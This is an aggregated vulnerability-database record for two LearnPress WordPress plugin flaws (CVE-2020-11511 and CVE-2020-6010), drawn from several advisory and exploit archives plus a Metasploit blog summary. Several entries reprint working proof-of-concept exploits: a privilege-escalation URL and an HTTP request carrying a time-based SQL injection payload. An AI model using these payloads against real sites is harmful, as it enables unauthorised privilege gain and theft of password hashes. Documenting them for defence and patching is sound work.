\"LP Instructor\"", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-11511"], "modified": "2020-04-29T05:00:08", "id": "WPVDB-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD", "href": "https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-15T22:19:43", "description": "This could allow a low privilege user, to perform a time based SQL Injection attack and retrieve data from the DB, such as hashed passwords.\n", "cvss3": {}, "published": "2020-04-29T00:00:00", "type": "wpvulndb", "title": "Learnpress < 3.2.6.8 - Authenticated Time Based Blind SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-6010"], "modified": "2020-05-02T05:00:06", "id": "WPVDB-ID:B65A4C93-0F6D-461E-B3E0-7DBE29918335", "href": "https://wpscan.com/vulnerability/b65a4c93-0f6d-461e-b3e0-7dbe29918335", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-04-20T19:54:32", "description": "Privilege Escalation vulnerability discovered in WordPress LearnPress plugin (versions <= 3.2.6.7).\n\n## Solution\n\nUpdate the WordPress LearnPress plugin to the latest available version (at least 3.2.6.8).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-29T00:00:00", "type": "patchstack", "title": "WordPress LearnPress plugin <= 3.2.6.7 - Privilege Escalation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511"], "modified": "2020-04-29T00:00:00", "id": "PATCHSTACK:30EFAA24C04671FACDE9BBE53776B7B5", "href": "https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-3-2-6-7-privilege-escalation-vulnerability", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T19:54:31", "description": "Authenticated Time Based Blind SQL Injection (SQLi) vulnerability discovered in WordPress LearnPress plugin (versions <= 3.2.6.7).\n\n## Solution\n\nUpdate the WordPress LearnPress plugin to the latest available version (at least 3.2.6.8).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-29T00:00:00", "type": "patchstack", "title": "WordPress LearnPress plugin <= 3.2.6.7 - Authenticated Time Based Blind SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010"], "modified": "2020-04-29T00:00:00", "id": "PATCHSTACK:039833A50A4F09E67ABD6CBA6645BA7E", "href": "https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-3-2-6-7-authenticated-time-based-blind-sql-injection-sqli-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-03T01:55:52", "description": "", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "zdt", "title": "WordPress LearnPress 3.2.6.8 Plugin - Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511"], "modified": "2021-07-19T00:00:00", "id": "1337DAY-ID-36566", "href": "https://0day.today/exploit/description/36566", "sourceData": "# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation\n# Exploit Author: nhattruong or nhattruong.blog\n# Vendor Homepage: https://thimpress.com/learnpress/\n# Software Link: https://wordpress.org/plugins/learnpress/\n# Version: < 3.2.6.9\n# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd\n# CVE: CVE-2020-11511\n\nPOC:\n1. Find out your user id\n2. Login with your cred\n3. Execute the payload\n\n\nhttp://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>\n\n# Done!\n", "sourceHref": "https://0day.today/exploit/36566", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:52:28", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "zdt", "title": "WordPress LearnPress 3.2.6.7 Plugin - (current_items) SQL Injection (Authenticated) Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010"], "modified": "2021-07-19T00:00:00", "id": "1337DAY-ID-36565", "href": "https://0day.today/exploit/description/36565", "sourceData": "# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)\n# Exploit Author: nhattruong or nhattruong.blog\n# Vendor Homepage: https://thimpress.com/learnpress/\n# Software Link: https://wordpress.org/plugins/learnpress/\n# Version: < 3.2.6.8\n# References link: https://wpscan.com/vulnerability/10208\n# CVE: CVE-2020-6010\n\nPOC:\n1. Go to url http://<host>/wp-admin\n2. Login with a cred\n3. Execute the payload\n\n\nPOST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\nAccept: application/json, text/plain, */*\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nReferer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order\nContent-Type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\nContent-Length: 128\nOrigin: http://localhost\nConnection: close\nCookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145\n\ntype=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -\n\n# Modify current_items[] as you want\n", "sourceHref": "https://0day.today/exploit/36565", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-07-19T15:47:10", "description": "", "cvss3": {}, "published": "2021-07-19T00:00:00", "type": "packetstorm", "title": "WordPress LearnPress Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11511"], "modified": "2021-07-19T00:00:00", "id": "PACKETSTORM:163538", "href": "https://packetstormsecurity.com/files/163538/WordPress-LearnPress-Privilege-Escalation.html", "sourceData": "`# Exploit Title: WordPress Plugin LearnPress < 3.2.6.9 - User Registration Privilege Escalation \n# Date: 07-17-2021 \n# Exploit Author: nhattruong or nhattruong.blog \n# Vendor Homepage: https://thimpress.com/learnpress/ \n# Software Link: https://wordpress.org/plugins/learnpress/ \n# Version: < 3.2.6.9 \n# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd \n# CVE: CVE-2020-11511 \n \nPOC: \n1. Find out your user id \n2. Login with your cred \n3. Execute the payload \n \n \nhttp://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id> \n \n# Done! \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163538/wplearnpress-escalate.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-19T15:54:03", "description": "", "cvss3": {}, "published": "2021-07-19T00:00:00", "type": "packetstorm", "title": "WordPress LearnPress SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6010"], "modified": "2021-07-19T00:00:00", "id": "PACKETSTORM:163536", "href": "https://packetstormsecurity.com/files/163536/WordPress-LearnPress-SQL-Injection.html", "sourceData": "`# Exploit Title: WordPress Plugin LearnPress < 3.2.6.8 - SQL Injection (Authenticated) \n# Date: 07-17-2021 \n# Exploit Author: nhattruong or nhattruong.blog \n# Vendor Homepage: https://thimpress.com/learnpress/ \n# Software Link: https://wordpress.org/plugins/learnpress/ \n# Version: < 3.2.6.8 \n# References link: https://wpscan.com/vulnerability/10208 \n# CVE: CVE-2020-6010 \n \nPOC: \n1. Go to url http://<host>/wp-admin \n2. Login with a cred \n3. Execute the payload \n \n \nPOST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 \nAccept: application/json, text/plain, */* \nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order \nContent-Type: application/x-www-form-urlencoded \nX-Requested-With: XMLHttpRequest \nContent-Length: 128 \nOrigin: http://localhost \nConnection: close \nCookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145 \n \ntype=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- - \n \n# Modify current_items[] as you want \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163536/wplearnpress-sql.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-02-15T22:19:44", "description": "The LearnPress plugin through 3.2.6.8 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter. The \"LP Instructor\" role grants the \"unfiltered_html\" capability, allowing an escalated user to insert posts containing malicious JavaScript\n", "cvss3": {}, "published": "2020-04-28T00:00:00", "type": "wpexploit", "title": "LearnPress < 3.2.6.9 - Privilege Escalation to \"LP Instructor\"", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11511"], "modified": "2020-04-29T05:00:08", "id": "WPEX-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD", "href": "", "sourceData": "It is possible for a remote attacker to elevate the privileges of any user to LP Instructor by sending a request to any location within wp-admin, such as wp-admin/admin-post.php with the action parameter set to accept-to-be-teacher and the user_id parameter set to an arbitrary user ID. This is possible because the learn_press_accept_become_a_teacher function runs on the plugins_loaded action and lacks nonce checks and capability checks.", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-05-13T17:36:32", "description": "", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "exploitdb", "title": "WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511"], "modified": "2021-07-19T00:00:00", "id": "EDB-ID:50138", "href": "https://www.exploit-db.com/exploits/50138", "sourceData": "# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation\r\n# Date: 07-17-2021\r\n# Exploit Author: nhattruong or nhattruong.blog\r\n# Vendor Homepage: https://thimpress.com/learnpress/\r\n# Software Link: https://wordpress.org/plugins/learnpress/\r\n# Version: < 3.2.6.9\r\n# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd\r\n# CVE: CVE-2020-11511\r\n\r\nPOC:\r\n1. Find out your user id\r\n2. Login with your cred\r\n3. Execute the payload\r\n\r\n\r\nhttp://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>\r\n\r\n# Done!", "sourceHref": "https://www.exploit-db.com/download/50138", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-13T05:28:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "exploitdb", "title": "WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010", "2020-6010"], "modified": "2021-07-19T00:00:00", "id": "EDB-ID:50137", "href": "https://www.exploit-db.com/exploits/50137", "sourceData": "# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)\r\n# Date: 07-17-2021\r\n# Exploit Author: nhattruong or nhattruong.blog\r\n# Vendor Homepage: https://thimpress.com/learnpress/\r\n# Software Link: https://wordpress.org/plugins/learnpress/\r\n# Version: < 3.2.6.8\r\n# References link: https://wpscan.com/vulnerability/10208\r\n# CVE: CVE-2020-6010\r\n\r\nPOC:\r\n1. Go to url http://<host>/wp-admin\r\n2. Login with a cred\r\n3. Execute the payload\r\n\r\n\r\nPOST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\r\nAccept: application/json, text/plain, */*\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 128\r\nOrigin: http://localhost\r\nConnection: close\r\nCookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145\r\n\r\ntype=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -\r\n\r\n# Modify current_items[] as you want", "sourceHref": "https://www.exploit-db.com/download/50137", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:17:49", "description": "The LearnPress plugin before 3.2.6.9 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-30T14:15:00", "type": "cve", "title": "CVE-2020-11511", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511"], "modified": "2021-08-06T17:25:00", "cpe": [], "id": "CVE-2020-11511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11511", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T18:45:37", "description": "LearnPress Wordpress plugin version prior and including 3.2.6.7 is vulnerable to SQL Injection", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T15:15:00", "type": "cve", "title": "CVE-2020-6010", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010"], "modified": "2021-07-19T18:15:00", "cpe": ["cpe:/a:thimpress:learnpress:3.2.6.7"], "id": "CVE-2020-6010", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-6010", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:thimpress:learnpress:3.2.6.7:*:*:*:*:wordpress:*:*"]}], "rapid7blog": [{"lastseen": "2021-08-27T22:57:32", "description": "## LearnPress authenticated SQL injection\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/08/metasploit-blg-3-copy.png)\n\nMetasploit contributor [h00die](<https://github.com/h00die>) added a new module that exploits [CVE-2020-6010](<https://attackerkb.com/topics/x12K9JOfk2/cve-2020-6010?referrer=blog>), an authenticated SQL injection vulnerability in the WordPress LearnPress plugin. When a user is logged in with `contributor` privileges or higher, the `id` parameter can be used to inject arbitrary code through an `SQL` query. This exploit can be used to collect usernames and password hashes. The responsible code is located in `learnpress/inc/admin/lp-admin-functions.php` at line `1690`. The vulnerability affects plugin versions `v3.2.6.7` and prior.\n\n## Continuous improvement\n\nIn addition to new exploit modules, Metasploit releases include a number of enhancements and bug fixes. This week we would like to highlight a few key enhancements that improve usability. Contributor [pingport80](<https://github.com/pingport80>) added support for easy reading of binary files from target systems compromised through a PowerShell session. Our very own [sjanusz-r7](<https://github.com/sjanusz-r7>) added a default payload option to the `postgres_payload` module so that payloads update correctly when changing target systems. An enhancement made by our own [gwillcox-r7](<https://github.com/gwillcox-r7>) extends Windows process lib injection beyond just `notepad.exe`. The logic now selects from a random list that can be updated in the future. We appreciate all the contributions that make Metasploit more robust and easier to use.\n\n## New module content (1)\n\n * [Wordpress LearnPress current_items Authenticated SQLi](<https://github.com/rapid7/metasploit-framework/pull/15593>) by [Omri Herscovici](<https://twitter.com/omriher>), [Sagi Tzadik](<https://twitter.com/sagitz_>), [h00die](<https://github.com/h00die>), and [nhattruong](<https://github.com/truongtn>), which exploits [CVE-2020-6010](<https://attackerkb.com/topics/x12K9JOfk2/cve-2020-6010?referrer=blog>) \\- This collects usernames and password hashes from Wordpress installations via an authenticated SQL injection vulnerability that exists in LearnPress plugin versions below `v3.2.6.8`.\n\n## Enhancements and features\n\n * [#15384](<https://github.com/rapid7/metasploit-framework/pull/15384>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This consolidates and changes the library code used by exploits that use RDLLs. The changes improve upon the logic used to start a process to host the RDLL so it is no longer notepad.exe but randomly selected from a list that can also be updated in the future.\n * [#15477](<https://github.com/rapid7/metasploit-framework/pull/15477>) from [pingport80](<https://github.com/pingport80>) \\- This adds PowerShell session support to the `readable?` and `read_file` functions provided by the `Post::File` API.\n * [#15580](<https://github.com/rapid7/metasploit-framework/pull/15580>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- Updates `postgres_payload` exploit modules to specify a valid default PAYLOAD option when changing target architectures\n * [#15584](<https://github.com/rapid7/metasploit-framework/pull/15584>) from [h00die](<https://github.com/h00die>) \\- Updates the list of WordPress plugins and themes to allow users to discover more plugins and themes when running tools such as `auxiliary/scanner/http/wordpress_scanner`\n\n## Bugs fixed\n\n * [#15496](<https://github.com/rapid7/metasploit-framework/pull/15496>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Users can now specify the SSL version for servers with the `SSLVersion` datastore option, ensuring compatibility with a range of targets old and new.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.1...6.1.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-20T05%3A13%3A43-05%3A00..2021-08-26T11%3A21%3A14-05%3A00%22>)\n * [Full diff 6.1.1...6.1.2](<https://github.com/rapid7/metasploit-framework/compare/6.1.1...6.1.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-27T19:03:42", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010"], "modified": "2021-08-27T19:03:42", "id": "RAPID7BLOG:85C739BC95D61BF1E93C9617469F50C1", "href": "https://blog.rapid7.com/2021/08/27/metasploit-wrap-up-127/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

WordPress Plugin 'LearnPress' &lt; 3.2.6.8 Multiple Vulnerabilities

Description

